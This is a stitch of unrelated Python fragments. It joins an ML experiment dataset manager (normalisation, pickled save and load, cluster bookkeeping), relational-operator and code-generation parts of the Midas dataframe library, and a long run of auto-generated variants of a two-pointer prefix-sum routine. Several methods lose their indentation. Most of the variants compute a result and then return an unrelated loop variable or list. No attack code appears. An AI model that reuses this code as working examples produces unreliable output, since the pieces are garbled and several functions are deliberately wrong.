# self.param_original.shape[1:]))
# Refresh datapoint-cluster information (prepare for reclustering)
# CLUSTER STATISTICS make as a method
if not self.skip_clust:
if self.cluster_object.datapoint_losses is not None:
new_data_zeros = np.zeros(self.outcomes.shape[0] - \
self.cluster_object.datapoint_losses.shape[0])
self.cluster_object.datapoint_losses = \
np.append(self.datapoint_losses, new_data_zeros)
self.cluster_object.has_loss = \
np.append(self.has_loss, new_data_zeros.astype(int))
# reset datapoints to cluster
self.cluster_object.datapoints_to_cluster = \
np.zeros_like(self.outcomes, int)
def apply_normalisation(self, data):
""" Transform data based on normalisation flag """
if self._normalise_flag=='gaussian':
zero_std_idxs = np.where(self.param_stats['std'] == 0)
if len(zero_std_idxs[0]):
self.param_stats['std'][zero_std_idxs] = 1.
return (data - self.param_stats['mu'])/self.param_stats['std']
elif self._normalise_flag=='scaled':
scale = max(self.datagen_object.srange)
assert scale > 0
return data / scale
else:
return data
def apply_denormalisation(self, data):
""" Apply inverse transform to data based on normalisation flag """
if self._normalise_flag=='gaussian':
return data * self.param_stats['std'] + self.param_stats['mu']
elif self._normalise_flag=='scaled':
scale = max(self.datagen_object.srange)
assert scale > 0
return data * scale
else:
return data
def update_representations(self, embedding_fn, recn_fn=None,
                           ae_name='param',
                           verbose=False, save_dataset=False, **kwargs):
    """Refresh latent embeddings and reconstructions for the dataset.

    Args:
        embedding_fn: callable mapping original data to latent codes.
        recn_fn: optional callable mapping latent codes back to data.
        ae_name: which space is updated: 'param'/'pca' for the parameter
            autoencoder, 'traj' for the trajectory autoencoder.
        verbose: forwarded to the cluster update.
        save_dataset: when True, pickle the dataset afterwards.
        **kwargs: ignored here; accepted for call-site compatibility.
    """
    # Update Autoencoder latent and reconstruction space
    if ae_name=='param' or ae_name=='pca':
        self.param_embedded = embedding_fn(self.param_original)
        if recn_fn is not None:
            self.param_reconstructed = recn_fn(self.param_embedded)
            # Per-sample reconstruction error over the finite columns only
            tmp_orig = self.param_original.reshape(self.param_original.shape[0], -1)
            tmp_recn = self.param_reconstructed.reshape(self.param_reconstructed.shape[0], -1)
            ninf_idx = np.where(tmp_recn[0]<np.inf)[0]
            errors = tmp_orig[:, ninf_idx] - tmp_recn[:, ninf_idx]
            self.recn_error = np.linalg.norm(errors, axis=1)
            self.training_loss_dict[ae_name] = {'reconstruction':
                                                np.mean(self.recn_error)}
        # Update clustering and info
        if not self.skip_clust:
            self.cluster_object.update_clusters(self.param_embedded,
                                                self.outcomes,
                                                verbose=verbose)
        else:
            logger.info(">>> skipping clustering.\n")
    elif ae_name=='traj':
        self.traj_embedded = embedding_fn(self.traj_original)
        if recn_fn is not None:
            self.traj_reconstructed = recn_fn(self.traj_embedded)
    # Update dataset statistics
    # NOTE(review): these stats are computed from param_embedded even
    # when ae_name == 'traj' -- confirm this is intended.
    self.latent_stats['mu'] = np.mean(self.param_embedded, axis=0)
    self.latent_stats['std'] = np.std(self.param_embedded, axis=0)
    self.latent_stats['cov'] = np.cov(self.param_embedded.reshape(
                               self.num_datapoints,-1), rowvar=False)
    if save_dataset: self.save_dataset()
def save_dataset(self):
task_data_dict = {
# data
"outcomes": self.outcomes,
"param_original": self.param_original,
"param_embedded": self.param_embedded,
"param_reconstructed": self.param_reconstructed,
"recn_error": self.recn_error,
# trajectories and behaviours
"traj_original": self.traj_original,
"traj_embedded": self.traj_embedded,
"traj_reconstructed": self.traj_reconstructed,
"traj_main": self.traj_data['main'],
"traj_aux": self.traj_data['aux'],
"metric_bd": self.metric_bd,
"metric_traj_dtw": self.metric_traj_dtw,
# cluster stuff
"classes_per_loop": self.classes_per_loop,
"datapoints_to_cluster": self.cluster_object.datapoints_to_cluster,
"cluster_to_class": self.cluster_object.cluster_to_class,
"cluster_to_datapoints": self.cluster_object.cluster_to_datapoints,
"cluster_to_centroids": self.cluster_object.cluster_to_centroids,
# plotting samples
# "sample_emb": self._sample_emb,
# "sample_recn":self._sample_recn,
}
if not os.path.isdir(self.dirname):
logger.warning("No directory {}; Creating...".format(self.dirname))
os.makedirs(self.dirname)
with open(self.dirname+"/experiment_dataset.dat", "wb") as f:
pickle.dump(task_data_dict, f)
# @timing
def load_dataset(self, write_loaded=True):
    """
    Load a pickled dataset from `load_dataset_path` and use it as loop 0.

    Restores all data containers and cluster bookkeeping, recomputes
    centroids/medoids and statistics, optionally logs the restored
    points as loop-0 discoveries, and finally refreshes manager info.

    Args:
        write_loaded: when True, record the loaded points in the
            data-discovery CSV as loop 0.
    """
    self.datagen_object.initial = False
    with open(self.load_dataset_path + "/experiment_dataset.dat", "rb") as f:
        task_data_dict = pickle.load(f)
    self.outcomes = task_data_dict['outcomes']
    self.param_original = task_data_dict['param_original']
    self.param_embedded = task_data_dict['param_embedded']
    self.param_reconstructed = task_data_dict['param_reconstructed']
    self.recn_error = task_data_dict['recn_error']
    # BUGFIX: 'traj_original' was previously assigned twice.
    self.traj_original = task_data_dict['traj_original']
    self.traj_embedded = task_data_dict['traj_embedded']
    self.traj_reconstructed = task_data_dict['traj_reconstructed']
    self.traj_data['main'] = task_data_dict['traj_main']
    self.traj_data['aux'] = task_data_dict['traj_aux']
    # Support datasets saved under the legacy 'metric_conbin' key
    if 'metric_bd' in task_data_dict:
        self.metric_bd = task_data_dict['metric_bd']
    else:
        self.metric_bd = task_data_dict['metric_conbin']
    self.metric_traj_dtw = task_data_dict['metric_traj_dtw']
    # Restore cluster bookkeeping and recompute centroids/medoids
    self.cluster_object.datapoints_to_cluster = \
        task_data_dict['datapoints_to_cluster']
    self.cluster_object.cluster_to_class = \
        task_data_dict['cluster_to_class']
    self.cluster_object.cluster_to_datapoints = \
        task_data_dict['cluster_to_datapoints']
    self.cluster_object.num_clusters = \
        len(task_data_dict['cluster_to_datapoints'])
    self.cluster_object.get_cluster_centroids(self.param_embedded)
    self.cluster_object.get_cluster_medoids(self.param_embedded)
    # Update dataset statistics
    self.unique_classes = np.unique(self.outcomes)
    self.num_datapoints = len(self.outcomes)
    self.metric_traj_dtw_norm = \
        None if self.metric_traj_dtw is None \
        else self.metric_traj_dtw / np.max(self.metric_traj_dtw)
    if self.load_model_path is None:
        class_sz = {0: 0, -1: 0}
        class_sz.update({cc: np.count_nonzero(self.outcomes == cc) \
                         for cc in np.unique(self.outcomes)})
        self.classes_per_loop.append(class_sz)
    else:
        self.classes_per_loop = task_data_dict['classes_per_loop']
        class_sz = self.classes_per_loop[-1]
    # Log info (consistency fix: use the module logger, not the root
    # `logging` module, like every other method in this class)
    logger.info("RESTORED saved dataset; {} datapoints; "
                "Classes: {}\n{}\tLocation: {}".format(
                    self.outcomes.shape[0], class_sz, _TAB,
                    self.load_dataset_path + "/experiment_dataset.dat"))
    # Save as data generated in Loop 0
    if write_loaded:
        unique_bds = np.argmax(np.unique(self.metric_bd, axis=0), axis=1)
        self._write_discovery(nloop=0, n_new=len(self.outcomes),
                              unique_bds=unique_bds, outcomes=self.outcomes)
    # Update info
    self._update_info(loaded=True)
""" MANAGE BATCHING """
def init_batching(self, nloop, nepoch=None, update_dict=None, **kwargs):
""" Syncronise the Batch Manager and get num_iter"""
if update_dict is not None:
self.update_representations(**update_dict)
return self.batch_object.init_batching(
nloop=nloop, nepoch=nepoch,
data_orig=self.param_original,
labels_orig=self.outcomes,
data_recn=self.param_reconstructed,
datagen_object=self.datagen_object,
**kwargs)
def generate_batch(self, **kwargs):
""" Interface to the Batch Manager """
return self.batch_object.generate_batch(
data_orig=self.param_original,
labels_orig=self.outcomes,
data_recn=self.param_reconstructed,
traj_main=self.traj_original,
metric_traj_dtw=self.metric_traj_dtw_norm,
metric_bd=self.metric_bd,
cluster_object=self.cluster_object,
datagen_object=self.datagen_object,
**kwargs)
""" MANAGE DATA GENERATION """
def generate_data(self, nloop,
sample_plot_fn=None, aux_title=None, aux_save=None,
**kwargs):
"""
Generate new data for the dataset, using a _datagen_fn function.
| |
plot_heatmap(self, zoom_start=12, radius=12):
return plot_heatmap(self, zoom_start, radius)
def linear_regression(self, x: str, y: str):
    """Simple 1-D ordinary-least-squares regression of y on x.

    Arguments:
        x {str} -- name of the predictor column
        y {str} -- name of the response column

    Returns:
        an (intercept, slope) tuple.  DOCFIX: the previous docstring
        claimed (slope, intercept); the actual return order is
        intercept first.

    Raises:
        ZeroDivisionError -- if the x column is constant.
    """
    x_vals = self[x]
    y_vals = self[y]
    # mean of our inputs and outputs
    x_mean = np.mean(x_vals)
    y_mean = np.mean(y_vals)
    n = len(self)
    numerator = 0
    denominator = 0
    # accumulate cov(x, y) and var(x); slope = cov / var
    for i in range(n):
        dx = x_vals[i] - x_mean
        numerator += dx * (y_vals[i] - y_mean)
        denominator += dx * dx
    slope = numerator / denominator
    intercept = y_mean - (slope * x_mean)
    return intercept, slope
def static_vis(self, **kwargs):
    """Render a one-off (non-reactive) visualisation of this dataframe.

    Called in place of `vis` for reactive cells, whose participation in
    the event loop is different from the others.

    Optional keyword arguments (Midas will guess the rest):
        mark   -- "bar" | "circle" | "line"
        x      -- name of the column to be the x axis
        x_type -- "ordinal" | "quantitative" | "temporal"
        y      -- name of the column to be the y axis
        y_type -- "ordinal" | "quantitative" | "temporal"
        sort   -- "" | "x" | "y" | "-x" | "-y"

    Returns a VegaLite object, or None when no spec could be parsed.
    """
    spec = parse_encoding(kwargs, self)
    if not spec:
        return None
    sanity_check_spec_with_data(spec, self)
    # do show me
    return VegaLite(static_vega_gen(spec, self))
def can_join(self, other_df: 'MidasDataFrame', col_name: str, col_name_other: Optional[str]=None):
    """Register a join relationship between this df and *other_df*.

    Both dataframes must be named, otherwise UserError is raised.  When
    col_name_other is omitted, the same column name is assumed on both
    sides of the join.
    """
    if not (self.df_name and other_df.df_name):
        raise UserError("DF not defined")
    left_ref = ColumnRef(col_name, self.df_name)
    right_col = col_name_other if col_name_other else col_name
    predicates = [JoinPredicate(left_ref,
                                ColumnRef(right_col, other_df.df_name))]
    self._rt_funcs.add_join_info(JoinInfo(self, other_df, predicates))
def apply_selection(self, all_predicates: List[SelectionValue]):
    """Apply selections originating from other charts to this df.

    Returns None when there is nothing to apply.
    """
    if not all_predicates:
        return None
    return self._rt_funcs.apply_other_selection(self, all_predicates)
def apply_self_selection_value(self, predicates: List[SelectionValue]):
    """Filter this df by its own selections, converted to predicates."""
    executable = [create_predicate(p) for p in predicates]
    return self.apply_predicates(executable)
def apply_predicates(self, predicates: List[Predicate]) -> 'MidasDataFrame':
    """Chain each predicate as a `where` clause over this dataframe."""
    filtered = self
    for pred in predicates:
        filtered = filtered.where(pred.column_or_label,
                                  pred.value_or_predicate,
                                  pred.other)
    return filtered
def _set_current_filtered_data(self, mdf: Optional['MidasDataFrame']):
    """Record the dataframe filtered by the current tick (may be None)."""
    self.current_filtered_data = mdf
# not currently used, but might be helpful in the future
# @property
# def is_base_df(self) -> bool:
# return self._ops.op_type == RelationalOpType.base # type: ignore
class RelationalOp(object):
    """Base node of the relational-operator tree.

    Subclasses set `op_type` and, except for the leaf BaseOp, keep a
    reference to the operation that produced their input in `child`.
    """
    op_type: RelationalOpType
    child: 'RelationalOp'  # type: ignore

    def has_child(self):
        """True when this node wraps a non-None child operation."""
        return getattr(self, "child", None) is not None
class BaseOp(RelationalOp):
    """Leaf of the op tree: a named base table with no child."""

    def __init__(self, df_name: DFName, df_id: DFId, table: Table):
        self.op_type = RelationalOpType.base
        self.table = table
        self.df_id = df_id
        self.df_name = df_name

    def __repr__(self):
        return f"{{{self.op_type.value}: '{self.df_name}'}}"

    def __str__(self):
        return repr(self)
class Select(RelationalOp):
    """Projection: keep only the given columns of the child relation."""

    def __init__(self, columns: ColumnSelection, child: RelationalOp):
        self.op_type = RelationalOpType.project
        self.child = child
        self.columns = columns

    def __repr__(self):
        return f"{{{self.op_type.value}: {{columns:{self.columns}, of: {self.child}}}}}"
class GroupBy(RelationalOp):
    """Grouping: group the child relation by `columns`, aggregating with
    the optional `collect` function."""

    def __init__(self, columns: ColumnSelection, collect, child: RelationalOp):
        self.op_type = RelationalOpType.groupby
        self.child = child
        self.columns = columns
        self.collect = collect

    def __repr__(self):
        return f"{{{self.op_type.value}: {{columns:{self.columns}, collect:{self.collect}, child: {self.child}}}}}"
class Where(RelationalOp):
    """Selection: filter the child relation by a predicate."""

    def __init__(self, predicate: Predicate, child: RelationalOp):
        self.op_type = RelationalOpType.where
        self.child = child
        self.predicate = predicate

    def __repr__(self):
        return f"{{{self.op_type.value}: {{predicate:{self.predicate}, of: {self.child}}}}}"
class Join(RelationalOp):
    """Join of the child relation (the "self" side) with another df.

    Arguments:
        self_columns {ColumnSelection} -- join columns of this df
        other {MidasDataFrame} -- the other dataframe; a full df (not an
            op) because code generation needs to know its name
        other_columns {ColumnSelection} -- join columns of the other df
        child {RelationalOp} -- operation producing the "self" relation
    """

    def __init__(self, self_columns: ColumnSelection, other: MidasDataFrame, other_columns: ColumnSelection, child: RelationalOp):
        self.op_type = RelationalOpType.join
        self.child = child
        self.self_columns = self_columns
        self.other_columns = other_columns
        self.other = other

    def __repr__(self):
        return f"{{{self.op_type.value}: {{left: {self.child}, right: {self.other._ops}, on: {self.self_columns},{self.other_columns}}}}}"
# Note, place here because of cyclic imports : (
class DFInfo(object):
    """Bookkeeping wrapper around a (non-visualized) dataframe."""

    def __init__(self, df: MidasDataFrame):
        # df is the immediate df that might be filtered by each tick
        self.df = df
        self.df_type = "original"
        self.created_on = datetime.now()
class VisualizedDFInfo(DFInfo):
    """DFInfo for a dataframe shown in a chart; keeps both the original
    df and the one currently filtered by selections."""

    def __init__(self, df: MidasDataFrame):
        if not df.df_name:
            raise InternalLogicalError("Visualized dfs must have df_names")
        self.df = df
        self.df_name = df.df_name
        # original df is that which was defined at the beginning
        self.original_df = df
        self.df_type = "visualized"
        self.created_on = datetime.now()

    def update_df(self, df: Optional[MidasDataFrame]) -> bool:
        """Replace the current df, reporting whether it changed.

        Arguments:
            df {MidasDataFrame} -- the dataframe to update with

        Returns:
            bool -- False when the new df carries the same _id as the
            current one (no change), True otherwise.
        """
        if df is not None and self.df is not None and self.df._id == df._id:
            return False
        self.df = df
        return True

    def __repr__(self) -> str:
        return f"df_info for {self.original_df.df_name}"
def get_midas_code(op: RelationalOp, midas_reference_name: str) -> str:
    """Recursively generate datascience-style Python code for an op tree.

    Args:
        op: root of the RelationalOp tree to serialise.
        midas_reference_name: variable name of the Midas instance in the
            generated code (used to qualify `are.*` predicate helpers).

    Returns:
        A code string that, when evaluated, reproduces the relation.

    Raises:
        NotImplementedError: for unknown op types.
    """
    if op.op_type == RelationalOpType.base:
        # Leaf: just reference the base table by name.
        b_op = cast(BaseOp, op)
        return b_op.df_name
    else:
        # Generate the child's code first, then wrap it.
        prev_table = get_midas_code(op.child, midas_reference_name)
        if op.op_type == RelationalOpType.where:
            s_op = cast(Where, op)
            col_or_label = convert_value_or_predicate(
                s_op.predicate.column_or_label,
                midas_reference_name
            )
            val_or_pred = convert_value_or_predicate(
                s_op.predicate.value_or_predicate,
                midas_reference_name
            )
            if s_op.predicate.other is None:
                return f"{prev_table}.where({col_or_label}, {val_or_pred})"
            else:
                other = convert_value_or_predicate(
                    s_op.predicate.other,
                    midas_reference_name
                )
                return f"{prev_table}.where({col_or_label}, {val_or_pred}, {other})"
        if op.op_type == RelationalOpType.project:
            p_op = cast(Select, op)
            new_table = f"{prev_table}.select({p_op.columns!r})"
            return new_table
        if op.op_type == RelationalOpType.groupby:
            g_op = cast(GroupBy, op)
            if g_op.collect is None:
                return f"{prev_table}.group({g_op.columns!r})"
            else:
                group_fun = get_lambda_declaration_or_fn_name(g_op.collect)
                return f"{prev_table}.group({g_op.columns!r}, {group_fun})"
        if op.op_type == RelationalOpType.join:
            j_op = cast(Join, op)
            join_prep_code = ""
            # we assume that the other has data!
            if j_op.other.df_name is not None:
                other_df_name = j_op.other.df_name
            else:
                # NOTE(review): the second hasattr operand looks odd --
                # it checks j_op.other._suggested_df_name for a nested
                # "_suggested_df_name"; likely only
                # hasattr(j_op.other, "_suggested_df_name") was meant.
                # Confirm before changing.
                if not(hasattr(j_op.other, "_suggested_df_name") or hasattr(j_op.other._suggested_df_name, "_suggested_df_name")):
                    raise InternalLogicalError("the join df should have a suggested name")
                ops_code = get_midas_code(j_op.other._ops, midas_reference_name)
                join_prep_code = f"{j_op.other._suggested_df_name} = {ops_code}"
                other_df_name = j_op.other._suggested_df_name
            new_table = f"{join_prep_code}\n{prev_table}.join({j_op.self_columns!r}, {other_df_name}, {j_op.other_columns!r})"
            return new_table
        else:
            raise NotImplementedError(op.op_type)
def convert_value_or_predicate(val_or_pred, midas_reference_name) -> str:
    """Convert a value or predicate into a code string.

    val_or_pred: intended to be a function or callable from the
        datascience.predicates module, a plain function, or a literal
        value (anything else falls through to repr()).
    midas_reference_name: variable name of the Midas instance used to
        qualify `are.*` predicate constructors in the generated code.
    """
    if val_or_pred is None:
        return "None"
    elif inspect.getmodule(val_or_pred) and inspect.getmodule(val_or_pred).__name__ == 'datascience.predicates':
        # Get the parameters captured by the predicate's closure
        closure_vars = inspect.getclosurevars(val_or_pred.f).nonlocals
        # Re-emit them positionally (keyword form left commented out)
        # assignments = ", ".join(f"{k}={v}" for k, v in closure_vars.items())
        assignments = ", ".join(f"{v}" for _, v in closure_vars.items())
        _, line_no = inspect.getsourcelines(val_or_pred)
        lines, _ = inspect.findsource(inspect.getmodule(val_or_pred))
        atok = asttokens.ASTTokens("".join(lines), parse=True)
        # Consider the possible predicate functions this could be
        function_nodes = filter(
            lambda node: isinstance(node, ast.FunctionDef)
            and node.lineno < line_no, ast.walk(atok.tree)
        )
        # The correct predicate function has the greatest line number
        # smaller than the lineno (lineno is a line number of a line of code
        # within the correct predicate function)
        f = max(function_nodes, key=operator.attrgetter("lineno")).name  # type: ignore
        return f"{midas_reference_name}.are.{f}({assignments})"
    elif inspect.isfunction(val_or_pred):
        return get_lambda_declaration_or_fn_name(val_or_pred)
    else:
        # Fallback: literal representation of the value
        return repr(val_or_pred)
def get_lambda_declaration_or_fn_name(fn: Callable) -> str:
    """Return source text for a lambda, or the bare name of a named function.

    None maps to the string "None" so the result can be spliced directly
    into generated code.
    """
    if fn is None:
        return "None"
    if fn.__name__ != "<lambda>":
        return fn.__name__
    # Lambda: recover its exact source span via asttokens offsets.
    src = inspect.getsource(fn)
    tokens = asttokens.ASTTokens(src, parse=True)
    node = next(n for n in ast.walk(tokens.tree) if isinstance(n, ast.Lambda))
    begin, finish = node.first_token.startpos, node.last_token.endpos  # type: ignore
    return src[begin: finish]
def eval_op(op: RelationalOp) -> Optional[Table]:
    """Execute an op tree bottom-up and return the resulting Table.

    Returns None when a child evaluates to a falsy table (propagated
    upward); raises NotImplementedError for unknown op types.
    """
    if op.op_type == RelationalOpType.base:
        return cast(BaseOp, op).table
    source = eval_op(op.child)
    if not source:
        return None
    if op.op_type == RelationalOpType.where:
        w_op = cast(Where, op)
        return source.where(w_op.predicate.column_or_label,
                            w_op.predicate.value_or_predicate,
                            w_op.predicate.other)
    if op.op_type == RelationalOpType.project:
        return source.select(cast(Select, op).columns)
    if op.op_type == RelationalOpType.groupby:
        g_op = cast(GroupBy, op)
        return source.group(g_op.columns, g_op.collect)
    if op.op_type == RelationalOpType.join:
        j_op = cast(Join, op)
        return source.join(j_op.self_columns, j_op.other.table,
                           j_op.other_columns)
    raise NotImplementedError(op.op_type)
def create_predicate(s: SelectionValue) -> Predicate:
    """Translate a chart selection into a datascience Predicate."""
    column = s.column.col_name
    kind = s.selection_type
    if kind == SelectionType.numeric_range:
        rng = cast(NumericRangeSelection, s)
        return Predicate(column,
                         are.between_or_equal_to(rng.minVal, rng.maxVal))
    if kind == SelectionType.string_set:
        chosen = cast(SetSelection, s)
        return Predicate(column, are.contained_in(chosen.val))
    raise NotAllCaseHandledError(
        f"Got {s.selection_type}, and we only support {SelectionType.string_set}, {SelectionType.numeric_range}, and {SelectionType.single_value}")
# helper tables placed here due to import issues
def get_selectable_column(mdf: MidasDataFrame)->Set[str]:
# if anything is the result of groupby aggregation
columns_grouped | |
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return totalsum
def func_a0601ae8aa534f048cb6098f9f85db51(N, A):
    """Two-pointer sweep over prefix sums of A (Python 2: uses xrange).

    Computes the minimal getsum window and its complement, but this
    auto-generated variant ultimately returns the plain sum of A.
    `getsum` is defined elsewhere in this file.
    """
    total = sum(A)
    prefix = [value for value in A]
    for idx in xrange(1, N):
        prefix[idx] += prefix[idx - 1]
    smallest = total
    hi = 0
    for lo in xrange(N):
        if hi < lo:
            hi += 1
        # advance the right pointer while the window sum keeps improving
        while hi < N - 1 and getsum(lo, hi, total, prefix) >= \
                getsum(lo, hi + 1, total, prefix):
            hi += 1
        smallest = min(smallest, getsum(lo, hi, total, prefix))
    smallest = total - smallest
    return total
def func_c952a48a25e247f8be18eabaf023cdfd(N, A):
    """Auto-generated variant: runs the two-pointer prefix-sum sweep but
    returns the last prefix-loop index `i` (== N - 1; NameError if N < 2).

    Python 2 code (xrange); `getsum` is defined elsewhere in this file.
    """
    total = sum(A)
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # advance the right pointer while the window sum keeps improving
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    best = total - best
    return i
def func_835332840fcf4d8e917feeca658aec77(N, A):
    """Auto-generated variant: runs the two-pointer prefix-sum sweep but
    returns the final left-pointer index `a` (== N - 1; NameError if
    N == 0 since the loop never binds `a`).

    Python 2 code (xrange); `getsum` is defined elsewhere in this file.
    """
    total = sum(A)
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # advance the right pointer while the window sum keeps improving
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    best = total - best
    return a
def func_1a6aa03d8fed4735b6c35cda31b064e8(N, A):
    """Return total minus the minimal getsum window, found with a
    two-pointer sweep over prefix sums of A.

    Python 2 code (xrange); `getsum` is defined elsewhere in this file.
    """
    total = sum(A)
    prefix = [value for value in A]
    for idx in xrange(1, N):
        prefix[idx] += prefix[idx - 1]
    answer = total
    hi = 0
    for lo in xrange(N):
        if hi < lo:
            hi += 1
        # advance the right pointer while the window sum keeps improving
        while hi < N - 1 and getsum(lo, hi, total, prefix) >= \
                getsum(lo, hi + 1, total, prefix):
            hi += 1
        answer = min(answer, getsum(lo, hi, total, prefix))
    answer = total - answer
    return answer
def func_41a16dbe9ef949c3a0325a4933038f16(N, A):
    # Auto-generated variant: returns the final right pointer `b` of the
    # two-pointer scan; the computed `best` is discarded.
    total = sum(A)
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    best = total - best
    return b
def func_297acb7c309b46209e1a96b19a82e91a(T, N, total, A):
    """Two-pointer sliding-window scan over prefix sums of A.

    Returns the leaked loop variable `a` (N-1) as in the sibling variants.
    `T` (case number) is accepted for signature compatibility but unused.
    """
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: the original wrote `best = total - best('Case #%d' % T)`, which
    # calls the integer `best` like a function -- a guaranteed TypeError.
    best = total - best
    return a
def func_8c735db321ef4188a222ecdcd7b2efe8(T, N, total, A):
    """Two-pointer sliding-window scan over prefix sums of A.

    Returns the final right pointer `b`. `T` is unused.
    """
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the spurious call on the integer `best`
    # (`best('Case #%d' % T)`), which raised TypeError at runtime.
    best = total - best
    return b
def func_dd31827642ae4575831fe6cda5a39b91(T, N, total, A):
    """Two-pointer sliding-window scan over prefix sums of A.

    Returns total minus the minimum window score. `T` is unused.
    """
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the spurious call on the integer `best`
    # (`best('Case #%d' % T)`), which raised TypeError at runtime.
    best = total - best
    return best
def func_1d7e4a5716a44b22a2305573c28676a1(T, N, total, A):
    """Two-pointer sliding-window scan over prefix sums of A.

    Returns the prefix-sum list `totalsum`. `T` is unused.
    """
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the spurious call on the integer `best`
    # (`best('Case #%d' % T)`), which raised TypeError at runtime.
    best = total - best
    return totalsum
def func_c4ac65d1931343bb9b6e996ad4152ef3(T, N, total, A):
    """Two-pointer sliding-window scan over prefix sums of A.

    Returns the leaked prefix-sum loop variable `i` (N-1 for N > 1).
    `T` is unused.
    """
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the spurious call on the integer `best`
    # (`best('Case #%d' % T)`), which raised TypeError at runtime.
    best = total - best
    return i
def func_f27c58c7cc4d4147a89c1096958515f5(T, N, total, totalsum):
    """Two-pointer sliding-window scan; mutates `totalsum` into prefix sums
    in place and returns total minus the minimum window score.

    `T` is accepted for signature compatibility but unused.
    """
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: the original chained two calls onto the integer `best`
    # (best('Case #%d' % T)(...)), a guaranteed TypeError; the intended
    # statement is the plain subtraction.
    best = total - best
    return best
def func_e62fe36dc80e44a0a41bea416e4f92f1(T, N, total, totalsum):
    """Two-pointer sliding-window scan; mutates `totalsum` into prefix sums
    in place. Returns the leaked loop variable `a` (N-1). `T` is unused.
    """
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the chained calls on the integer `best`, which raised
    # TypeError at runtime.
    best = total - best
    return a
def func_e11294462e2445489b52e6b0eed435ee(T, N, total, totalsum):
    """Two-pointer sliding-window scan; mutates `totalsum` into prefix sums
    in place. Returns the leaked loop variable `i` (N-1 for N > 1).
    `T` is unused.
    """
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the chained calls on the integer `best`, which raised
    # TypeError at runtime.
    best = total - best
    return i
def func_49924ab686004a759bf4948f2bb194d6(T, N, total, totalsum):
    """Two-pointer sliding-window scan; mutates `totalsum` into prefix sums
    in place. Returns the final right pointer `b`. `T` is unused.
    """
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
    for a in xrange(N):
        if b < a:
            b += 1
        # Greedily advance b while the next window does not score better.
        while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
            1, total, totalsum):
            b += 1
        best = min(best, getsum(a, b, total, totalsum))
    # Fix: removed the chained calls on the integer `best`, which raised
    # TypeError at runtime.
    best = total - best
    return b
def func_75b0e58d5c2046e0bb5b1406882523c4(infile):
    # Reads N, p, q, r, s via `line(infile)` (defined elsewhere), generates
    # the sequence A = (i*p + q) % r + s, runs the sliding-window scan --
    # then discards `best` and returns the parameter `r`
    # (auto-generated return-variant).
    N, p, q, r, s = line(infile)
    A = [((i * p + q) % r + s) for i in xrange(N)]
    total = sum(A)
    totalsum = [a for a in A]
    for i in xrange(1, N):
        totalsum[i] += totalsum[i - 1]
    best = total
    b = 0
